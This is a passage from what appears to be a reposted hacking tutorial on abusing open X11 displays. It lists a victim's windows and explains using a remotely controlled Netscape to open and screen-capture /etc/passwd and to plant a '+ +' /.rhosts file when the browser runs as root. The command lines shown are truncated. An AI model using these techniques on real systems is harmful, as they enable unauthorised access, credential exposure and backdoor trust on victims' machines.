0x1c0000c "FvwmButtons": ("FvwmButtons" "FvwmButtons") 385x68+0+0 +635+4
0x2400005 "xload": ("xload" "XLoad") 106x52+2+2 +637+6
0x2000002 "Desktop": ("FvwmPager" "FvwmModule") 105x64+277+2 +912+6
0x30001ec "Netscape": ("communicator-4_72_bin" "Netscape") 1x1+0+0 +0+0
0x3000172 "Communicator Bookmarks for Roelof Temmingh": ("bookmarks" "Netscape") 872x622+10+10 +10+10
0x300001c " ": ("mozillaComponentBar" "Netscape") 5x5+50+50 +50+50
0x3000001 "Netscape": ("communicator-4.72.bin" "Netscape") 1x1+0+0 +0+0
If the victim is using more than one virtual screen you will be able to see the other screen listed (you won't see it with xwd). With a bit of luck you get a Netscape browser open. To get Netscape open on an open X11 display is very good news as you can remotely control Netscape. Fancy telling Netscape to open /etc/passwd and doing another screen capture? Here is how :
netscape -display
xwd -display
xv /tmp/netscape
You can even tell Netscape to write files. It won't work trying to overwrite files - you will find a nasty Netscape popup, but you can write files that do not exist. You could create a page with "+ +" on it, redirect the browser to the page, and, if Netscape is running as root, save it to /.rhosts. Be sure to have a close look at http://home.netscape.com/newsref/std/x-remote.html if you find an open X11 running Netscape.
In theory you could also send keystrokes to an open X display. I found the program "xpusher.c" at , fiddled around with it, but it does not seem to work. There might be other programs around.
Subscribe to:
Posts (Atom)